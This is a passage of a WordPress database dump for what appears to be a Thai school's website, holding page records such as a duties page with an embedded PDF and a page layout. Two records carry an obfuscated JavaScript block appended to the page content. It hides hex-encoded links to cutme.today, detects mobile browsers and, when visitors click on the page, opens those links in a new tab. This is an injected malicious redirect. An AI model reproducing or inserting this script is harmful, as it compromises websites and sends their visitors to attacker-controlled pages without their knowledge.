2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2024-08-06 11:39:09','2024-08-06 04:39:09','',459,'http://pakhaeng.ssk.in.th/?p=538',0,'revision','',0),
(542,1,'2024-08-06 13:16:00','2024-08-06 06:16:00','<!-- wp:file {\"id\":769,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O4อำนาจหน้าที่.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O4อำนาจหน้าที่.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"O4อำนาจหน้าที่\"></object><a id=\"wp-block-file--media-b9970199-24a4-4fe2-adae-06989ee49b2b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O4อำนาจหน้าที่.pdf\">O4อำนาจหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O4อำนาจหน้าที่.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-b9970199-24a4-4fe2-adae-06989ee49b2b\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','อำนาจหน้าที่','','publish','closed','closed','','%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%b2%e0%b8%88%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b8%97%e0%b8%b5%e0%b9%88','','','2024-08-09 11:47:02','2024-08-09 04:47:02','',0,'http://pakhaeng.ssk.in.th/?page_id=542',0,'page','',0),
(544,1,'2024-08-06 13:16:00','2024-08-06 06:16:00','','อำนาจหน้าที่','','inherit','closed','closed','','542-revision-v1','','','2024-08-06 13:16:00','2024-08-06 06:16:00','',542,'http://pakhaeng.ssk.in.th/?p=544',0,'revision','',0),
(545,1,'2024-08-06 13:16:34','2024-08-06 06:16:34','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button 